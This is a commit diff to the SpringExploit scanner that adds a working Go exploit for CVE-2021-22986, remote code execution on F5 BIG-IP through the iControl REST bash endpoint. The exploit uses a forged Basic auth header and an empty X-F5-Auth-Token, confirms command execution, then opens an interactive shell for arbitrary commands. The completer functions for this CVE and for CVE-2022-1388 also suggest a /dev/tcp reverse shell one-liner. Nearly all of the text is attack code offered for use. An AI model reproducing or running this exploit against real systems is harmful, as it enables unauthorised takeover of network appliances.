支持CVE-2021-22986

Author: SummerSec

README.md

@@ -28,7 +28,7 @@
 * [x] 支持指定ip段eg: 192.168.0.0/24
 * [x] 命令执行漏洞式支持交互式执行命令
 * [ ] 验证url是否存活
-* [ ] 增加自动更新参数
+* [x] 增加自动更新参数
 
 ………
 
@@ -71,7 +71,9 @@ SpringExploit -f urls.txt -t 50
 SpringExploit -u https://www.baidu.com/ -proxy http://127.0.0.1:1080
 SpringExploit -i 127.0.0.1/24
 SpringExploit -u https://www.baidu.com/ -p CVE202222947,CVE202222963
-SpringExploit -u https://www.baidu.com/ -p CVE20221388 -shell 
+SpringExploit -u https://www.baidu.com/ -p CVE20221388 -shell
+SpringExploit -sp
+
 ```
 
 ![image-20220422190411847](https://cdn.jsdelivr.net/gh/SummerSec/Images/2022/03/19u419ec19u419ec.png)

cmd/commons/attack/Pocslist.go

@@ -11,6 +11,7 @@ const (
 
 	// 2021年list
 	CVE202126084 string = "CVE202126084"
+	CVE202122986 string = "CVE202122986"
 )
 
 func GetList() *list.List {
@@ -24,6 +25,7 @@ func GetList() *list.List {
 
 	// 2021年漏洞
 	l.PushBack(CVE202126084)
+	l.PushBack(CVE202122986)
 
 	return l
 }

cmd/commons/attack/attack.go

@@ -29,13 +29,16 @@ func init() {
 
 func addPoc(pocs map[string]interface{}) map[string]interface{} {
 	log.Debug("[*] Add PoC")
-	// TODO 添加poc
+	// TODO 添加 2022 poc
 	//pocs["demo"] = &poc.Demo{}
 	pocs["CVE202222947"] = &_022.CVE202222947{}
 	pocs["CVE202222963"] = &_022.CVE202222963{}
 	pocs["CVE202126084"] = &_021.CVE202126084{}
 	pocs["CVE202222965"] = &_022.CVE202222965{}
+
+	// TODO 添加2021 poc
 	pocs["CVE20221388"] = &_022.CVE20221388{}
+	pocs["CVE202122986"] = &_021.CVE202122986{}
 	return pocs
 
 }

cmd/commons/poc/2021/CVE-2021-22986.go

@@ -0,0 +1,126 @@
+package _021
+
+import (
+	"encoding/json"
+	req2 "github.com/SummerSec/SpringExploit/cmd/commons/req"
+	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
+	"github.com/c-bata/go-prompt"
+	"github.com/imroc/req/v3"
+	log "github.com/sirupsen/logrus"
+	"net/url"
+	"strings"
+)
+
+// 参考 https://github.com/Al1ex/CVE-2021-22986/blob/main/CVE_2021_22986.pyl
+
+type CVE202122986 struct{}
+
+func (t CVE202122986) SendPoc(target string, hashmap map[string]interface{}) {
+	log.Debug("[+] Start CVE-2021-22986")
+
+	//reqinfo := req2.NewReqInfo()
+	//reqmap := structs.Map(reqinfo)
+	reqmap := req2.NewReqInfoToMap(hashmap)
+
+	// 初始化请求
+	// TODO 可以设置超时时间 重复次数 代理等 下面默认使用默认值
+	reqmap["h1"] = true
+
+	u, _ := url.Parse(target)
+	path := "/mgmt/tm/util/bash"
+	reqmap["url"] = u.Scheme + "://" + u.Host + path
+	reqmap["method"] = "POST"
+
+	headers := map[string]string{
+		//"Host":       "localhost",
+		"User-Agent": utils.GetUA(),
+		//"Connection":      "keep-alive, x-f5-auTh-tOKen, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd,X-F5-New-Authtok-Reqd,X-Forwarded-Server,X-Forwarded-Host",
+		//"Connection":      "keep-alive",
+		"Authorization":   "Basic YWRtaW46QVNhc1M=",
+		"X-F5-Auth-Token": "",
+		"Content-Type":    "application/json",
+	}
+
+	reqmap["headers"] = headers
+
+	randstr := utils.GetCode(10)
+	log.Debugf("[+] randstr: %s", randstr)
+	base64str := utils.EncodeString(randstr)
+	log.Debugf("[+] base64str: %s", base64str)
+
+	reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c 'echo " + base64str + " | base64 -d'\"}"
+	//reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}"
+	log.Debug("[+] Send CVE-2021-22986 request")
+	resp := utils.Send(reqmap)
+
+	if t.CheckExp(resp, randstr, hashmap) {
+		t.SaveResult(target, hashmap["Out"].(string))
+	}
+
+	if hashmap["Shell"].(bool) {
+		log.Info("[+] Start CVE-2021-22986 shell")
+		th := prompt.Input("[+] Please input command: ", completer)
+		if th == "" {
+			th = "whoami |base64 "
+		} else {
+			th = th + " |base64 "
+		}
+		reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c '" + th + "'\"}"
+		resp = utils.Send(reqmap)
+		txt := resp.String()
+
+		log.Debugf("[+] resp: %s", txt)
+		var txtmap map[string]interface{}
+		err := json.Unmarshal([]byte(txt), &txtmap)
+		if err != nil {
+			log.Errorf("[-] Unmarshal error: %s", err)
+			return
+		}
+		log.Info("命令执行结果: " + utils.DecodeString(txtmap["commandResult"].(string)))
+		log.Info("[+] End CVE-2021-22986 shell")
+	}
+
+}
+
+func (CVE202122986) SaveResult(target string, file string) {
+	result := target + " 存在 CVE-2021-22986 漏洞 可以使用 SpringExplit -u " + target + " -p CVE202122986 --shell 进入交互shell执行命令"
+	err := utils.SaveToFile(result, file)
+	log.Info(result)
+	if err != nil {
+		return
+	}
+
+}
+
+func (CVE202122986) CheckExp(resp *req.Response, randstr string, hashmap map[string]interface{}) bool {
+	defer func() {
+		if err := recover(); err != nil {
+			log.Error("[-] CheckExp error: ", err)
+		}
+	}()
+	res := resp.String()
+	if res == "" {
+		return false
+	}
+	log.Debugf(res)
+	if strings.Contains(res, randstr) {
+		// 将res 转化成map
+		var maps map[string]interface{}
+		err := json.Unmarshal([]byte(res), &maps)
+		log.Info("CVE-2021-22986 命令执行返回 commandResult: ", maps["commandResult"])
+		if err != nil {
+			log.Debugf("[-] json.Unmarshal error: %s", err)
+			return false
+		}
+		return true
+	}
+	return false
+}
+
+func completer(d prompt.Document) []prompt.Suggest {
+	s := []prompt.Suggest{
+		{Text: "id", Description: "you can type command {id}"},
+		{Text: "bash", Description: "you can type command bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/8080 <&1'"},
+	}
+	return prompt.FilterHasPrefix(s, d.GetWordBeforeCursor(), true)
+}

cmd/commons/poc/2022/CVE-2022-1388.go

@@ -119,6 +119,7 @@ func (CVE20221388) CheckExp(resp *req.Response, randstr string, hashmap map[stri
 func completer(d prompt.Document) []prompt.Suggest {
 	s := []prompt.Suggest{
 		{Text: "id", Description: "you can type command {id}"},
+		{Text: "bash", Description: "you can type command bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/8080 <&1'"},
 	}
 	return prompt.FilterHasPrefix(s, d.GetWordBeforeCursor(), true)
 }